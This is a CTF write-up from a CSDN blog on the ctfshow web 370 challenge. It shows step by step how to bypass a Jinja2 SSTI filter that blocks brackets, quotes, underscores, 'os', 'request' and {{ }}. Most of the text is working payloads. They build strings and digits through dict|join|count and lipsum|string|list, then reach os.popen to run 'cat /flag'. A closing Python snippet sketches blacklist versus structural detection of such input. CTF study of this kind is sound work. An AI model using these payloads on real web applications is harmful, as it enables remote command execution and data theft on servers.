SSTI template injection: bypassing filters on square brackets, args, underscore, single and double quotes, os, request, curly braces and digits (ctfshow web入门 370) - CSDN blog
SSTI template injection
I didn't know the {% %} syntax yet, so this was a good chance to learn it. Testing showed that {{ }} is filtered.
So let's get started.
We can use this statement to check whether SSTI exists:
{%if condition%}result{%endif%}
To explain: if the condition is true it outputs result, otherwise it outputs nothing. Adjusting it a bit:
{%if not a%}yes{%endif%}
A second way is {%print 123%}: if 123 is printed, SSTI is confirmed.
Here I'm following another author's writeup; their challenge also filtered digits, so let's look at that too.
Getting digits
{%set one=dict(c=a)|join|count%}{%set two=dict(cc=a)|join|count%}{%set three=dict(ccc=a)|join|count%}
This gives us digits: dict(c=a)|join joins the dict's keys into the string "c", and |count returns its length, 1; a key of cc gives 2, and so on.
But this challenge doesn't need that.
Next, let's settle on the payload we need:
(lipsum|attr(__globals__)).get(os).popen(cat /flag).read()
At this point we need _, which we get from lipsum|string|list.
We can then pull _ out with the pop method.
First we need pop.
pop removes the element at a given index from a list and returns that element.
{%set pop=dict(pop=a)|join%}
{%set one=dict(c=a)|join|count%}
{%set two=dict(cc=a)|join|count%}
{%set three=dict(ccc=a)|join|count%}
{%set four=dict(cccc=a)|join|count%}
{%set five=dict(ccccc=a)|join|count%}
{%set six=dict(cccccc=a)|join|count%}
{%set seven=dict(ccccccc=a)|join|count%}
{%set eight=dict(cccccccc=a)|join|count%}
{%set nine=dict(ccccccccc=a)|join|count%}
{%set pop=dict(pop=a)|join%}
{%set xiahuaxian=(lipsum|string|list)%}{%print xiahuaxian%}
Counting through the printed list, _ is at index 24, so we just index it:
{%set one=dict(c=a)|join|count%}
{%set two=dict(cc=a)|join|count%}
{%set three=dict(ccc=a)|join|count%}
{%set four=dict(cccc=a)|join|count%}
{%set five=dict(ccccc=a)|join|count%}
{%set six=dict(cccccc=a)|join|count%}
{%set seven=dict(ccccccc=a)|join|count%}
{%set eight=dict(cccccccc=a)|join|count%}
{%set nine=dict(ccccccccc=a)|join|count%}
{%set pop=dict(pop=a)|join%}
{%set xiahuaxian=(lipsum|string|list)|attr(pop)(three*eight)%}{%print xiahuaxian%}
Got it.
Next, get __globals__:
name={%set one=dict(c=a)|join|count%}
{%set two=dict(cc=a)|join|count%}
{%set three=dict(ccc=a)|join|count%}
{%set four=dict(cccc=a)|join|count%}
{%set five=dict(ccccc=a)|join|count%}
{%set six=dict(cccccc=a)|join|count%}
{%set seven=dict(ccccccc=a)|join|count%}
{%set eight=dict(cccccccc=a)|join|count%}
{%set nine=dict(ccccccccc=a)|join|count%}
{%set pop=dict(pop=a)|join%}
{%set xiahuaxian=(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{%print globals%}
Get os
First we need get:
{%set get=dict(get=a)|join%}{%print get%}
Then we can get os:
{%set shell=dict(o=a,s=b)|join%}{%print shell%}
Get popen
{%set popen=dict(pop=a,en=b)|join%}{%print popen%}
That got filtered; renaming the variable fixes it:
{%set one=dict(c=a)|join|count%}
{%set two=dict(cc=a)|join|count%}
{%set three=dict(ccc=a)|join|count%}
{%set four=dict(cccc=a)|join|count%}
{%set five=dict(ccccc=a)|join|count%}
{%set six=dict(cccccc=a)|join|count%}
{%set seven=dict(ccccccc=a)|join|count%}
{%set eight=dict(cccccccc=a)|join|count%}
{%set nine=dict(ccccccccc=a)|join|count%}
{%set pop=dict(pop=a)|join%}
{%set xiahuaxian=(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{%set get=dict(get=a)|join%}
{%set shell=dict(o=a,s=b)|join%}
{%set pp=dict(po=a,pen=b)|join%}
{%print lipsum|attr(globals)|attr(get)(shell)|attr(pp)%}
Got it.
Get chr
First we need __builtins__:
{%set one=dict(c=a)|join|count%}
{%set two=dict(cc=a)|join|count%}
{%set three=dict(ccc=a)|join|count%}
{%set four=dict(cccc=a)|join|count%}
{%set five=dict(ccccc=a)|join|count%}
{%set six=dict(cccccc=a)|join|count%}
{%set seven=dict(ccccccc=a)|join|count%}
{%set eight=dict(cccccccc=a)|join|count%}
{%set nine=dict(ccccccccc=a)|join|count%}
{%set pop=dict(pop=a)|join%}
{%set xiahuaxian=(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{%set get=dict(get=a)|join%}
{%set shell=dict(o=a,s=b)|join%}
{%set pp=dict(po=a,pen=b)|join%}
{%set builtins=(xiahuaxian,xiahuaxian,dict(builtins=a)|join,xiahuaxian,xiahuaxian)|join%}
{%print builtins%}
Now get chr:
{%set one=dict(c=a)|join|count%}
{%set two=dict(cc=a)|join|count%}
{%set three=dict(ccc=a)|join|count%}
{%set four=dict(cccc=a)|join|count%}
{%set five=dict(ccccc=a)|join|count%}
{%set six=dict(cccccc=a)|join|count%}
{%set seven=dict(ccccccc=a)|join|count%}
{%set eight=dict(cccccccc=a)|join|count%}
{%set nine=dict(ccccccccc=a)|join|count%}
{%set pop=dict(pop=a)|join%}
{%set xiahuaxian=(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{%set get=dict(get=a)|join%}
{%set shell=dict(o=a,s=b)|join%}
{%set pp=dict(po=a,pen=b)|join%}
{%set builtins=(xiahuaxian,xiahuaxian,dict(builtins=a)|join,xiahuaxian,xiahuaxian)|join%}
{%set char=(lipsum|attr(globals))|attr(get)(builtins)|attr(get)(dict(chr=a)|join)%}
{%print char%}
Success.
Then we build the command with char:
?name={%set one=dict(c=a)|join|count%}
{%set two=dict(cc=a)|join|count%}
{%set three=dict(ccc=a)|join|count%}
{%set four=dict(cccc=a)|join|count%}
{%set five=dict(ccccc=a)|join|count%}
{%set six=dict(cccccc=a)|join|count%}
{%set seven=dict(ccccccc=a)|join|count%}
{%set eight=dict(cccccccc=a)|join|count%}
{%set nine=dict(ccccccccc=a)|join|count%}
{%set pop=dict(pop=a)|join%}
{%set xiahuaxian=(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{%set get=dict(get=a)|join%}
{%set builtins=(xiahuaxian,xiahuaxian,dict(builtins=a)|join,xiahuaxian,xiahuaxian)|join%}
{%set char=(lipsum|attr(globals))|attr(get)(builtins)|attr(get)(dict(chr=a)|join)%}
{%set command=char(five*five*four-one)%2bchar(five*five*four-three)%2bchar(four*five*six-four)%2bchar(four*eight)%2bchar(six*eight-one)%2bchar(three*six*six-six)%2bchar(three*six*six)%2bchar(five*five*four-three)%2bchar(three*six*six-five)%}
{%print command%}
(%2b is the URL-encoded +, since a literal + in the query string would be decoded as a space; the arithmetic spells out the character codes of cat /flag.)
Next, get read:
name={%set read=dict(read=a)|join%}{%print read%}
Finally, put it all together and run the command:
name={%set one=dict(c=a)|join|count%}
{%set two=dict(cc=a)|join|count%}
{%set three=dict(ccc=a)|join|count%}
{%set four=dict(cccc=a)|join|count%}
{%set five=dict(ccccc=a)|join|count%}
{%set six=dict(cccccc=a)|join|count%}
{%set seven=dict(ccccccc=a)|join|count%}
{%set eight=dict(cccccccc=a)|join|count%}
{%set nine=dict(ccccccccc=a)|join|count%}
{%set pop=dict(pop=a)|join%}
{%set xiahuaxian=(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{%set get=dict(get=a)|join%}
{%set shell=dict(o=a,s=b)|join%}
{%set pp=dict(po=a,pen=b)|join%}
{%set builtins=(xiahuaxian,xiahuaxian,dict(builtins=a)|join,xiahuaxian,xiahuaxian)|join%}
{%set char=(lipsum|attr(globals))|attr(get)(builtins)|attr(get)(dict(chr=a)|join)%}
{%set command=char(five*five*four-one)%2bchar(five*five*four-three)%2bchar(four*five*six-four)%2bchar(four*eight)%2bchar(six*eight-one)%2bchar(three*six*six-six)%2bchar(three*six*six)%2bchar(five*five*four-three)%2bchar(three*six*six-five)%}
{%set read=dict(read=a)|join%}{%print (lipsum|attr(globals))|attr(get)(shell)|attr(pp)(command)|attr(read)()%}
I did learn a lot from this, but it's far too cumbersome. That's an extreme case; this challenge doesn't filter nearly that much.
Doing it the normal way:
{% set pop=dict(pop=1)|join %}
{% set kong=(lipsum|string|list)|attr(pop)(9) %}
{% set xhx=(lipsum|string|list)|attr(pop)(18) %}
{% set re=(config|string|list)|attr(pop)(239) %}
{% set globals=(xhx,xhx,dict(globals=a)|join,xhx,xhx)|join %}
{% set geti=(xhx,xhx,dict(get=a,item=b)|join,xhx,xhx)|join %}
{% set o=dict(o=a,s=b)|join %}
{% set po=dict(pop=a,en=b)|join %}
{% set cmd=(dict(cat=a)|join,kong,re,dict(flag=a)|join)|join %}
{% set read=dict(read=a)|join %}
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}
The underlying form here is something like lipsum.__globals__.getitem[os].popen(cat flag).read(). What a terrifying SSTI.
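As an added illustration (my own code, not the post's), here is a Python check on the ?name= parameter that contrasts the keyword blacklist this challenge applies with a structural check on the primitives the {% set %} bypass is built from; the sample values are constructed, with the last two taken from this page. The real fix is unchanged by either check: pass user input to the template as context data, never as template source.

```python
import re

# Keyword blacklist the challenge applies to ?name=, reconstructed from this page's
# description (the writeup the author follows additionally filtered digits).
CHALLENGE_BLACKLIST = ("{{", "}}", "[", "]", "args", "_", "'", '"', "os", "request")

# Structural primitives the {% set %} bypass on this page is built from.
TEMPLATE_TAGS = re.compile(r"\{%.*?%\}|\{\{.*?\}\}", re.S)
PRIMITIVES = {
    "attr_filter": re.compile(r"\|\s*attr\s*\("),              # replaces obj.x / obj[x]
    "dict_join":   re.compile(r"dict\s*\([^)]*\)\s*\|\s*join"),  # builds strings without quotes
    "count_digit": re.compile(r"\|\s*count\b"),                 # manufactures digits
    "string_list": re.compile(r"\|\s*string\s*\|\s*list"),      # harvests _ and space from reprs
}


def blacklist_blocks(payload: str) -> bool:
    """True when the keyword blacklist rejects the value: the filter this page bypasses."""
    return any(token in payload for token in CHALLENGE_BLACKLIST)


def structural_flags(payload: str) -> list[str]:
    """Names of the structural signals present, independent of keyword spelling."""
    flags = []
    if TEMPLATE_TAGS.search(payload):
        flags.append("template_tag")
    for name, pattern in PRIMITIVES.items():
        if pattern.search(payload):
            flags.append(name)
    return flags


def triage(payload: str) -> dict:
    """Run both checks on one request parameter value."""
    return {"blacklist": blacklist_blocks(payload), "structural": structural_flags(payload)}


# Constructed sample values for ?name=; the last two are the probe and the short
# bypass fragment quoted on this page.
SAMPLES = {
    "benign": "alice",
    "classic_probe": "{{7*7}}",
    "page_probe": "{%print 123%}",
    "page_bypass": "{% set pop=dict(pop=1)|join %}"
                   "{% set xhx=(lipsum|string|list)|attr(pop)(18) %}",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:13} {triage(value)}")
```

The blacklist stops only the classic {{ }} probe; both of the page's {% %} inputs pass it, while the structural check flags them on the template tag alone.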